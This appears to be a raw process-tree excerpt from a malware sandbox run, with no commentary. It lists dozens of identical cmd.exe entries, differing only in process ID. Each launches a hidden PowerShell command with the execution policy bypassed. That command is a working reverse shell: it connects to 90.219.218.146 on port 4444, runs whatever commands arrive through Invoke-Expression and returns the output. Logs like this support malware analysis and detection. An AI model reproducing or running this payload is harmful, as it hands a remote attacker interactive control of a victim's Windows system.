C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2992
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:336
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4892
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1948
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4808
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2820
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1860
-
-
